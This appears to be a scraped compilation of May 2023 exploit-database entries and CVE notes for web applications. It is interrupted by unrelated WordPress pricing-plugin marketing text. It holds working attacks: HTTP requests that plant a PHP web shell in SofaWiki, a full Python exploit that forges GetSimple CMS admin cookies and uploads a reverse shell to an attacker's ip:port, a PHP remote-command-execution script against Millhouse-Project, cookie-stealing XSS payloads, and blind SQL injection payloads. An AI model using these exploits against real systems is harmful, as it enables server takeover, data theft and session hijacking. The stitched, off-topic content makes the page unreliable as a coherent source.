SofaWiki <= 3.8.9 has a file upload vulnerability that leads to command execution.

1.  The PHP file an be uploaded directly by matching referer.

    // index.php
    case 'uploadbigfile':   		if ($user->hasright('upload', '') || stristr($swBaseHrefFolder,$referer))
    							{
    									include 'inc/special/uploadbigfile.php';
    							}
    

    // uploadbigfile.php
    if (isset($_FILES['uploadedfile']) && is_uploaded_file($_FILES['uploadedfile']['tmp_name']))
    {	 
    	 $filename = $_FILES['uploadedfile']['name'];
    	 $newfile = $swRoot.'/site/uploadbig/'.$filename;
    	 move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$newfile);
    	 
    	 $checksum = md5_file($newfile);
    	 if ($checksum == $filename)
    	 {
    		 echo 'upload ok '.$filename;
    	 }
    	 else
    	 {
    		 echo 'checksum error filename '.$filename.' checksum '.$checksum. ' length '.filesize($newfile);
    		 unlink($newfile);
    	 }
    	 
    	 $_FILES = null;
    	 
    	 exit();
    }
    

2.  Send a request package to get checksum.

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 243
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="idontknow"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

3.  Send three request packets using checksum to create a malicious PHP file.

> 1st

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 283
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="checkchunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh--
    

> 2nd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 266
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="edc4325bdef3f7fb70abd0389e85f6d1"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

> 3rd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 574
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfeK0BammsIbqUGBr
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="composechunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="comment"
    
    test
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="uploadtime"
    
    1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="start"
    
    0
    ------WebKitFormBoundaryfeK0BammsIbqUGBr--
    

4.  After uploading a malicious PHP file, arbitrary code can be executed.

CVE-2023-29721: [Vuln]There is a file upload vulnerability that leads to command execution. · Issue #27 · bellenuit/sofawiki

GetSimple CMS version 3.3.16 suffers from a remote shell upload vulnerability.

    # Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)# Data: 18/5/2023# Exploit Author : Youssef Muhammad# Vendor: Get-simple# Software Link:# Version app: 3.3.16# Tested on: linux# CVE: CVE-2022-41544import sysimport hashlibimport reimport requestsfrom xml.etree import ElementTreefrom threading import Threadimport telnetlibpurple = "\033[0;35m"reset = "\033[0m"yellow = "\033[93m"blue = "\033[34m"red = "\033[0;31m"def print_the_banner():    print(purple + ''' CCC V     V EEEE      22   000   22   22      4  4  11  5555 4  4 4  4 C    V     V E        2  2 0  00 2  2 2  2     4  4 111  5    4  4 4  4 C     V   V  EEE  ---   2  0 0 0   2    2  --- 4444  11  555  4444 4444 C      V V   E         2   00  0  2    2          4  11     5    4    4  CCC    V    EEEE     2222  000  2222 2222        4 11l1 555     4    4  '''+ reset)def get_version(target, path):    r = requests.get(f"http://{target}{path}admin/index.php")    match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)    if match:        version = match.group(1)        if version <= "3.3.16":            print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")        else:            print ("This is not vulnrable to this CVE")        return version    return Nonedef api_leak(target, path):    r = requests.get(f"http://{target}{path}data/other/authorization.xml")    if r.ok:        tree = ElementTree.fromstring(r.content)        apikey = tree[0].text        print(f"[+] apikey obtained {apikey}")        return apikey    return Nonedef set_cookies(username, version, apikey):    cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()    cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()    cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"    headers = {        'Content-Type':'application/x-www-form-urlencoded',        'Cookie': cookies    }    return headersdef get_csrf_token(target, path, headers):    r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)    m = re.search('nonce" type="hidden" value="(.*)"', r.text)    if m:        print("[+] csrf token obtained")        return m.group(1)    return Nonedef upload_shell(target, path, headers, nonce, shell_content):    upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"    payload = {        'content': shell_content,        'edited_file': '../shell.php',        'nonce': nonce,        'submitsave': 1    }    try:        response = requests.post(upload_url, headers=headers, data=payload)        if response.status_code == 200:            print("[+] Shell uploaded successfully!")        else:            print("(-) Shell upload failed!")    except requests.exceptions.RequestException as e:        print("(-) An error occurred while uploading the shell:", e)def shell_trigger(target, path):    url = f"http://{target}{path}/shell.php"    try:        response = requests.get(url)        if response.status_code == 200:            print("[+] Webshell trigged successfully!")        else:            print("(-) Failed to visit the page!")    except requests.exceptions.RequestException as e:        print("(-) An error occurred while visiting the page:", e)def main():    if len(sys.argv) != 5:        print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")        return    target = sys.argv[1]    path = sys.argv[2]    if not path.endswith('/'):        path += '/'    ip, port = sys.argv[3].split(':')    username = sys.argv[4]    shell_content = f"""<?php    $ip = '{ip}';    $port = {port};    $sock = fsockopen($ip, $port);    $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);    """    version = get_version(target, path)    if not version:        print("(-) could not get version")        return    apikey = api_leak(target, path)    if not apikey:        print("(-) could not get apikey")        return    headers = set_cookies(username, version, apikey)    nonce = get_csrf_token(target, path, headers)    if not nonce:        print("(-) could not get nonce")        return    upload_shell(target, path, headers, nonce, shell_content)    shell_trigger(target, path)if __name__ == '__main__':    print_the_banner()    main()

GetSimple CMS 3.3.16 Shell Upload

thrsrossi Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");$target     =  $options['u'];$command    =  $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array(    'Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',    'Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";?>

thrsrossi Millhouse-Project 1.414 Shell Upload

Webkul Qloapps version 1.5.2 suffers from a cross site scripting vulnerability.

# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)  
# Date: 15 May 2023  
# Exploit Author: Astik Rawat (ahrixia)  
# Vendor Homepage: https://qloapps.com/  
# Software Link: https://github.com/webkul/hotelcommerce  
# Version: 1.5.2  
# Tested on: Kali Linux 2022.4  
# CVE : CVE-2023-30256

Description:

A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.

Steps to exploit:  
1) Go to Signin page on the system.  
2) There are two parameters which can be exploited via XSS  
  - back  
  - email_create

2.1) Insert your payload in the "back"- GET and POST Request   
  Proof of concept (Poc):  
  The following payload will allow you to execute XSS - 

    Payload (Plain text):   
  xss onfocus=alert(1) autofocus= xss

  Payload (URL Encoded):   
  xss%20onfocus%3dalert(1)%20autofocus%3d%20xss

  Full GET Request (back):   
  [http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

2.2) Insert your payload in the "email_create" - POST Request Only  
  Proof of concept (Poc):  
  The following payload will allow you to execute XSS - 

  Payload (Plain text):   
  xss><img src=a onerror=alert(document.cookie)>xss

  Payload (URL Encoded):   
  xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss

  POST Request (email_create) (POST REQUEST DATA ONLY):   
  [controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

Webkul Qloapps 1.5.2 Cross Site Scripting

Quicklancer version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Quicklancer v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor:https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135# Demo Site: https://quicklancer.bylancer.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /php/user-ajax.php HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://localhostCookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;quickjob_view_counted=31; Quick_lang=arabicContent-Length: 93Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-aliveaction=searchStateCountry&dataString=deneme### Parameter & Payloads ###Parameter: dataString (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo

Quicklancer 1.0 SQL Injection

Esg version 2.5 suffers from a cross site scripting vulnerability.

**Esg 2.5 Cross Site Scripting**

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

**Esg 2.5 Cross Site Scripting**

    ===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,187)
*   Arbitrary (16,018)
*   BBS (2,859)
*   Bypass (1,690)
*   CGI (1,024)
*   Code Execution (7,128)
*   Conference (677)
*   Cracker (841)
*   CSRF (3,315)
*   DoS (23,129)
*   Encryption (2,360)
*   Exploit (51,088)
*   File Inclusion (4,193)
*   File Upload (952)
*   Firewall (821)
*   Info Disclosure (2,712)
*   Intrusion Detection (883)
*   Java (2,998)
*   JavaScript (838)
*   Kernel (6,550)
*   Local (14,376)
*   Magazine (586)
*   Overflow (12,597)
*   Perl (1,421)
*   PHP (5,123)
*   Proof of Concept (2,302)
*   Protocol (3,559)
*   Python (1,499)
*   Remote (30,474)
*   Root (3,552)
*   Rootkit (505)
*   Ruby (607)
*   Scanner (1,633)
*   Security Tool (7,845)
*   Shell (3,159)
*   Shellcode (1,211)
*   Sniffer (892)
*   Spoof (2,189)
*   SQL Injection (16,219)
*   TCP (2,394)
*   Trojan (687)
*   UDP (883)
*   Virus (664)
*   Vulnerability (31,548)
*   Web (9,548)
*   Whitepaper (3,742)
*   x86 (958)
*   XSS (17,668)
*   Other

**File Archives**

*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,970)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,746)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,312)
*   HPUX (879)
*   iOS (342)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,712)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,293)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,597)
*   UNIX (9,230)
*   UnixWare (186)
*   Windows (6,554)
*   Other

Esg 2.5 Cross Site Scripting

A vulnerability was found in SourceCodester Theme Park Ticketing System 1.0. It has been classified as critical. This affects an unknown part of the file print_ticket.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229821 was assigned to this vulnerability.

CVE-2023-2865

A vulnerability was found in SourceCodester Online Jewelry Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file customer.php of the component POST Parameter Handler. The manipulation of the argument Custid leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229820.

CVE-2023-2864

The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_postdata' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to modify access to the plugin when it should only be the administrator's privilege.

****Go Pricing** Current Version 3.3.19 – June 18, 2021****Create amazing WordPress Pricing & Compare Tables**

It’s super easy to create WordPress pricing or compare tables with Go Pricing. If you buy this product, you won’t need anything else.

These WordPress Pricing Tables support various Media Elements like Audio, Video, Image or Map. Just give it a try! We are sure you will never use any other table plugin.

For more information please scroll down!

  
**Key Features**

**Easy to Use Admin Interface** – Edit your tables quickly and swiftly with our clean UI. There are help texts, colours, icons to help you in the efficient navigation.

**Various Media Types** – Make your tables more unique and engaging by adding content types like: Audio, Video or Map.

**Google Fonts** – Take full use of the complete Google font set and find the best matching one to your site.

**2000+ Font Icons** – Font Awesome, Icomoon, Linecon & Material Icons give you scalable vector icons that can be instantly customized, and they will look gorgeous on high-resolution displays.

**Live Preview** – This function will enable you to see how your will look Pricing Table in real time.

**Bulk Actions** – You can perform various operations on the dashboard with multiple tables, like: cloning, exporting, deleting.

**Column Animations** – Give some vibe to your tables! Choose any of the 39 amazing transitions for each and every column according to your taste.

**Customisable Responsivity** – Thanks to the various configuration options you can make sure that your table provides the best possible experience on any device.

**Import & Export functions** – You can swiftly import demo tables, create or restore backups, and move your data between sites.

**Built-in Plugin Update** – You can keep your installed version up to date and utilise all the latest fixes, features and improvements.

**Small Footprint** – You can ensure that the content is only loaded when it is necessary.

**Classic and Modern in one? Yes.**  
If you like traditional _WordPress Pricing Tables_, but you would like to get much more, then you are at the right place. You will get all the usual pricing table features, and our plugin also supports Videos (Youtube, Vimeo, Screenr) and Images optional responsivity. Enjoy this _easy and quick_ way of creating stunning tables, and integrating them into your existing WordPress site was never easier thanks to our Admin Panel. You will surely find the one from our ready made, but customizable demo tables that fits the best for you.

**What else can I do with Go Pricing Tables? We have some ideas.  
**Beside traditional _Pricing Tables_ features the plugin is suitable for creating Team Viewer and Compare Tables. These features can also be found in the package.

**Is the system flexible? Yes.  
**The responsivity is optional. It can be turned On and Off and customizable to adapt to your site or CSS framework (e.g. Bootstrap). You can use System or any Google Web Fonts (650+).

**Can I use more than one table on my site? Yes.**  
You can use any number of tables on your site, or even on one single page using shortcodes.

**Style & Layout**

*   Column Animation  
    *   Column Transition
    *   Price Counter
*   Text based ribbon (CSS)  
*   Unlimited colors and color combination of columns
*   Unlimited and different number of rows in Body and Footer
*   Any number of columns up to 10
*   Configurable column space and border radius
*   Standard and circle Header Styles
*   Advanced row and column height Equalization System
*   Numerous column shadow and sign options
*   Unlimited buttons in Body and Footer
*   Unique tooltip style
*   Paypal and s2Member button shortcode support
*   650+ Google Web Font
*   1900+ Font icons  
    *   Font Awesome
    *   Icomoon
    *   Linecon
    *   Material Icons
*   250+ Starter Template
    *   90+ Classic Style
    *   150+ Clean Style

**Responsivity**

*   Optional and customizable responsivity per tables
*   Configurable Breakpoints and number of columns

*   Responsive Images
*   Audio
    *   SoundCloud
    *   Mixcloud
    *   Beatport
    *   HTML5 audio
*   Video
    *   YouTube
    *   Vimeo
    *   Screenr
    *   Dailymotion
    *   Metacafe
    *   HTML5 video
*   Google Map – Classic, Clean and custom pins
*   Custom iFrame

**Modern user-friendly Admin Interface**

*   Optionally Ajaxified Admin
*   Help System
*   Advanced Table Dashboard
    *   Searching and Sorting possibilities
    *   Cloning and Deleting bulk actions
*   Update Notification and built-in Update functionality  
*   Visual Table Editor – Sort, Delete and Clone columns and rows
*   Advanced data Export and Import
*   Built-in Live Preview with responsivity settings
*   Visual Composer compatibility

**Supports the Latest Web Technologies**

*   Supports all modern browsers on the market
    *   Chrome
    *   Firefox
    *   Safari
    *   Opera
    *   Internet Explorer (9+)
*   Touch support for mobile devices, including iOS, Android, and Windows

**Other**

*   Layered PSDs for signs and pins
*   Translation ready with .mo .po files

**Quality & Originality**

Our goal is the best quality, however issues may occur which we try to fix quickly. We continuously monitor customer feedbacks and suggestions. Always use the latest version of this product.

  
**Changelog**

**v3.3.19 – June 18, 2021**

*   \[FIX\] PHP 7.4 compatibility issues fix in frontend
*   \[FIX\] Minor backend CSS fixes

**v3.3.18 – December 28, 2020**

*   \[FIX\] WordPress 5.6 compatibility issues fix in backend and frontend
*   \[FIX\] Minor frontend JavaScript fixes

**v3.3.17 – March 05, 2020**

*   \[IMPROVEMENT\] New tooltip position possibilities and automatic alignment on mobiles
*   \[FIX\] Fix for tooltip “cut-off” issue on mobiles

**v3.3.16 – November 14, 2019**

*   \[FIX\] WordPress 5.3 compatibility issue fix

**v3.3.15 – July 8, 2019**

*   \[IMPROVEMENT\] Minor improvements in PHP code
*   \[IMPROVEMENT\] Cornerstone Page Builder integration

**v3.3.14 – Jan 21, 2019**

*   \[FIX\] PHP 7+ Compatibility issue fix
*   \[IMPROVEMENT\] Minor CSS improvement in the frontend CSS

**v3.3.13 – Aug 16, 2018**

*   \[IMPROVEMENT\] Improved API caching to prevent slow down of the admin page loading if API is unavailable

We are frequently releasing new features and bufixes to the plugin, so it is strongly recommended to keep it up do date, to make sure that you utilise all the latest fixes, features and improvements!

**View our Changelog details**

CVE-2023-2494: Go Pricing - WordPress Responsive Pricing Tables

SourceCodester Employee and Visitor Gate Pass Logging System v1.0 is vulnerable to SQL Injection via /employee_gatepass/classes/Login.php.

**BUG\_Author:**

**ZongXin Li**

**Affected version:**

EMPLOYEE AND VISITOR GATE PASS LOGGING SYSTEM - 1.0

**Vendor:**

https://www.sourcecodester.com/users/tips23

**Software:**

https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html

**Vulnerability File:**

/employee\_gatepass/classes/Login.php

**Description:**

The system Employee and Visitor Gate Pass Logging 1.0 is vulnerable to SQL Injection via /employee\_gatepass/classes/Login.php. The parameter username is not sanitized correctly. The malicious actor can use this vulnerability to manipulate the administrator account of the systemand can take full control of the information about the other accounts. Status: CRITICAL

GET parameter 'username' exists SQL injection vulnerability

Payload1:username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123
    

The server's response time is 10 seconds

Payload2:username=admin'and left(version(),6)='5.7.27' AND 'ledo'='ledo&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin'and left(version(),6)='5.7.26' AND 'ledo'='ledo&password=admin123
    

Error injection success

When I enter the version number 5.7.26, it returns "success". Error statement when typing 5.7.27

Tag

#php